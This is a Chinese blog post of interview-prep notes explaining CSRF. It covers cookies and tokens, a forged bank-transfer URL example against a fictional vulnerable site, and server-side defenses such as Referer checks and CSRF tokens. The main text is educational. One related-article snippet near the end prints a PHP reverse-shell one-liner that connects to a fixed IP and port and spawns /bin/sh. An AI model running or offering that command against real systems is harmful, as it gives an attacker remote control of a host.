实习面试篇--web安全之CSRF(跨站侵请求伪造)

最新推荐文章于 2023-06-11 00:36:56 发布
置顶 最新推荐文章于 2023-06-11 00:36:56 发布
阅读量349 收藏 4
点赞数 2
分类专栏: 网络安全 文章标签: 安全
原文链接:https://blog.csdn.net/quiet_girl/article/details/50598474
版权

实习面试篇–web安全之CSFR(跨站侵请求伪造)

**

知识储备:

**
cookie:Cookie 是浏览器访问服务器后,服务器传给浏览器的一段数据。(存储在用户本地的)
作用:
1.识别身份
2.记录历史,以后每次访问该网站都带cookie

token生成流程
用户访问某个表单页面。
服务端生成一个Token,放在用户的Session中,或者浏览器的Cookie中。
在页面表单附带上Token参数。
用户提交请求后,服务端验证表单中的Token是否与用户Session(或Cookies)中的Token一致,一致为合法请求,不是则非法请求。

一、CSRF基本概念

1.CSRF(Cross Site Request Forgery) 跨站请求伪造。也被称为One Click Attack和Session Riding,通常缩写为CSRF或XSRF。
简单来说就是攻击者假装成别人去发送恶意请求
请求包括发送邮件、发送消息、盗取账号、购买商品、银行转账,从而使你的个人隐私泄露和财产损失

二、CSRF原理

在这里插入图片描述

要完成CSRF这个攻击必须满足两点:
1.登录受信任网站A,并在本地生成Cookie
2.在不登出A的情况下,访问危险网站B

三、CSRF实例

我们先假设支付宝存在CSRF漏洞
在这里插入图片描述
受害者支付宝账号是:th
攻击者的支付宝账号是:qyc
通过网页请求的方式

http://zhifubao.com/withdraw?account=th&amount=10000&for=th2

可以把我账号th的10000元转到我的另外一个账号th2上去
通常情况下,服务器会先验证该请求是否来自一个合法的session并且该session的用户已经成功登陆在这里插入图片描述

受害者点击链接之后,被动的发送一个请求到支付宝后台

http://zhifubao.com/withdraw?account=th&amount=10000&for=qyc

而且这个请求会附带受害者的浏览器中的cookie。我的浏览器中的cookie存有我的认证信息,这个请求就会得到响应,从我的账户中转10000元到qyc账户里,而我丝毫不知情,攻击者拿到钱后逍遥法外。

四、CSRF防御

  1. 服务器端的防御措施

(1)验证HTTP Referer字段

HTTP头中有一个字段叫Referer,它记录了该HTTP请求的来源地址。在通常情况下,访问一个安全受限页面的请求必须来自于同一个网站。

比如上面支付宝转账界面当用户提交请求时,该转账请求的Referer值就会是转账按钮所在页面的URL(本例中,通常是以zhifubao.com域名开头的地址)。而如果攻击者要对银行网站实施CSRF攻击,他只能在自己的网站构造请求,当用户通过攻击者的网站发送请求到支付宝时,该请求的Referer是指向攻击者的网站。

因此,要防御CSRF攻击,支付宝只需要对于每一个转账请求验证其Referer值,如果是以zhifubao.com开头的域名,则说明该请求是来自支付宝网站自己的请求,是合法的。如果Referer是其他网站的话,就有可能是CSRF攻击,则拒绝该请求。

(2)在请求地址中添加token并验证

CSRF攻击之所以能够成功,是因为攻击者可以伪造用户的请求,该请求中所有的用户验证信息都存在于Cookie中,因此攻击者可以在不知道这些验证信息的情况下直接利用用户自己的Cookie来通过安全验证。

由此可知,抵御CSRF攻击的关键在于:在请求中放入攻击者所不能伪造的信息,并且该信息不存在于Cookie之中。

鉴于此,系统开发者可以在HTTP请求中以参数的形式加入一个随机产生的token,并在服务器端建立一个拦截器来验证这个token,如果请求中没有token或者token内容不正确,则认为可能是CSRF攻击而拒绝该请求。

(3)在HTTP头中自定义属性并验证

自定义属性的方法也是使用token并进行验证,和前一种方法不同的是,这里并不是把token以参数的形式置于HTTP请求之中,而是把它放到HTTP头中自定义的属性里。通过XMLHttpRequest这个类,可以一次性给所有该类请求加上csrftoken这个HTTP头属性,并把token值放入其中。
这种方法解决了前一种方法在请求中加入token的不便,同时,通过这个类请求的地址不会被记录到浏览器的地址栏,也不用担心token会通过Referer泄露到其他网站。但是需要整站加入ajax,比较麻烦。

  1. 其他方式的防御措施

(1)验证码,强制用户必须与应用进行交互,才能完成最终请求。通常情况下,验证码能够很好的遏制CSRF攻击。但是出于用户体验考虑,网站不能给所有的操作都加上验证码。因此验证码只能作为一种辅助手段。
(2)尽量使用POST,限制GET,GET接口能够直接将请求地址暴露给攻击者,所以要防止CSRF一定最好不要用GET。当然POST并不是万无一失,攻击者只需要构造一个form表单就可以,但需要在第三方页面做,这样就增加了暴露的可能性。

Xiaochunchunu
关注
  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
python实现简单http服务器功能
09-20
主要为大家详细介绍了python实现简单http服务器功能,具有一定的参考价值,感兴趣的小伙伴们可以参考一下
python实现简单的http服务器_python实现简单http服务器
weixin_39916360的博客
12-08 167
这个程序相比上面的数据多了一个对url的判断而已。这次我们用一个html文件来尝试。我们在一个文件夹下创建一个txt文件,写上这样一段代码:index我是登陆页面将后缀名txt修改成html。再创建一个create.html页面。只需要把里面的代码修改成:create我是注册页面接下来来写我们的python代码。import socketimport redef dump_data(cli_soc...
Python实现简单的http服务器程序
懂幸福,爱生活
01-13 4281
主要的需求是这样的,需要调用服务器端的程序获取GPU服务器的信息并且返回给前端显示出来,那么就需要完成一个服务器端的程序,获取服务器的数据之后将数据返回(以JSON格式)。
Python实现简单http服务器
12-24
写一个python脚本,实现简单的http服务器功能: 1.浏览器中输入网站地址:172.20.52.163:20014 2.server接到浏览器的请求后,读取本地的index.html文件的内容,回发给浏览器 代码实现 server.py #!/usr/bin/python import socket import signal import errno from time import sleep def HttpResponse(header,whtml): f = file(whtml) contxtlist = f.readlines() context = ''
python实现简单的http服务器_Python实现简单HTTP服务器(二)
weixin_39712455的博客
12-08 125
#coding:utf-8importsocketimportreimportsysfrom multiprocessing importProcessclassHTTPServer(object):def __init__(self, application):"""application:指的是框架的app"""self.server_socket=socket.socket(socket.A...
CSRF跨站请求伪造)详细说明
02-26
Cross-SiteRequestForgery(CSRF),中文一般译作跨站请求伪造。经常入选owasp漏洞列表Top10,在当前web漏洞排行中,与XSS和SQL注入并列前三。与前两者相比,CSRF相对来说受到的关注要小很多,但是危害却非常大。...
CSRF跨站请求伪造,含使用教程和测试工具
05-04
CSRF跨站请求伪造,使用OWASP CSRFTester工具可以抓取并伪造请求,其测试原理是,使用代理抓取我们在浏览器中访问过的所有的连接以及所有的表单等信息,通过在CSRFTester中修改相应的表单等信息,重新提交,相当于一...
Django CSRF跨站请求伪造防护过程解析
01-01
CSRF全称Cross-site request forgery(跨站请求伪造),是一种网络的攻击方式,也被称为“One Click Attack”或者Session Riding,通常缩写为CSRF或者XSRF。 攻击原理 1、用户访问正常的网站A,浏览器就会保存网站A...
论文研究-跨站请求伪造CSRF)攻击与防范技术研究 .pdf
08-23
跨站请求伪造CSRF)攻击与防范技术研究,刘雅楠,马兆丰,跨站请求伪造CSRF)攻击作为最严重的web漏洞威胁之一被列入了开放Web应用安全项目(OWASP)十大漏洞列表。该攻击具有很大隐蔽性和危
CSRF面试
m0_61990875的博客
11-08 505
CSRF部分面试题答案
Python简单http服务实现
weixin_30768175的博客
06-12 86
1、代码实现 # -*- coding: utf-8 -*-"""Created on Tue Jun 11 18:12:01 2019@author: wangymd"""from http.server import HTTPServer, BaseHTTPRequestHandlerimport jsondata = {'result': 'this is a http server te...
Python搭建简易HTTP服务(3.x版本和2.x版本的)
liver100day的博客
05-17 450
Python搭建简易HTTP服务(3.x版本和2.x版本的) 在平时的靶机练习中,时常会遇到我们已经通过漏洞,得到了目标靶机的最低权限,面临提权问题这种情况。 于是我就会用到下面这个方法来解决 一.生成一个木马 在本机上准备一个php文件,写入 <?php $sock=fsockopen("192.168.75.128",9966); exec("/bin/sh -i <&3 >&3 2>&3"); ?> (注意:这里的ip地址192.168.75.1
web面试CSRF以及如何防止CSRF的攻击
gecko
08-15 178
如何进行攻击? 如何防止攻击?
中间件和csrf面试
weixin_30311605的博客
07-19 372
from django.views.decorators.csrf import csrf_exempt 使用该装饰器,代表该函数可以免csrf认证 @csrf_exempt def function(request)   pass 面试题:csrf是什么?用过中间件做了什么?在那中间件的哪一个方法认证? 答:csrf 是在执行函数的时候校验是否带有一个随...
Python实现http协议、http服务器(1)
御坂御坂001的博客
05-25 2014
文章目录1.实现简单的http服务器2.设定套接字选项3.分会inde.html页面4.根据用户需求返回相应的页面 1.实现简单的http服务器 import socket def service_client(new_socket): """为这个客户端返回数据""" # 1. 接收浏览器发送过来的请求 ,即http请求 # GET / HTTP/1.1 ...
[ 渗透测试面试 ] 渗透测试面试题大集合(详解)(三)CSRF相关面试
qq_51577576的博客
11-28 1289
[ 渗透测试面试 ] 渗透测试面试题大集合(详解)(二)XSS注入相关面试题 渗透方向的岗位,涉及到的知识点是很广泛的。 这里我总结了整个一系列的面试题,可能没有覆盖到全部的知识面,但是应该是比较全面的,本文主讲解web漏洞CSRF方向的面试题。 如果整个系列的问题搞懂了大部分,那找个网安方向的工作基本上没什么问题了。 当然了,可能也不是说这些问题都会被问到,但这些题目都是和网安岗位相契合的。
[21届]web前端开发实习生岗位面试准备----信息安全
F1ash000
06-18 281
一、cookie 和 session 的区别 cookie 数据存放在客户的浏览器上,session 数据放在服务器上 cookie 不是很安全,别人可以分析存放在本地的 cookie 并进行 cookie 欺骗。考虑到安全应当使用 session session 会在一定时间内保存在服务器上。当访问增多,会比较占用你服务器的性能。考虑到减轻服务器性能方面,应当使用 cookie 单个 cookie 保存的数据不能超过 4K,很多浏览器都限制一个站点最多保存 20 个cookie 将登陆信息等重要信息存放
面试题:什么是CSRF攻击,如何避免
最新发布
jakelihua
06-11 240
明确数据范围:在使用HTTP协议进行请求时,为了防止 Cross-site Request,需要在 HTTP 请求头中加入一个随机的 token 作为校验码,在服务端比较 token 值与 cookie 中存储的值是否相同,若不同则拒绝请求。综上所述,为了防止CSRF攻击,我们应该养成使用 HttpOnly 属性的 cookie 以及在cookie中存储数据范围及请求随机 token 的良好习惯,此外合适地设计url结构来限制用户表单提交也是一种有效方法。
csrf(csrf请求非法是什么意思)
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
02-25 306
CSRF具体操作我想在Windows7安装一个SQLServer 这个按正常步骤安装就可以了啊,不知道你困惑在哪里。。。。 CSRF保护过滤器有什么功?CSRF保护过滤器有什么功能 安全漏洞跨站请求伪造(CSRF)Tomcatservlet容器的最新版本CSRF保护过滤器,它提供很多保护来防止CSRF攻击 X...
Web安全实验:跨站攻击(XSS+CSRF)原理与实战
"本次实验主要关注的是Web安全中的两种重要攻击方式:跨站脚本攻击(XSS)和跨站请求伪造CSRF)。实验旨在让参与者深入理解这两种攻击的原理,掌握不同级别的攻击实施,并了解相应的防御和修复措施。实验环境为...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值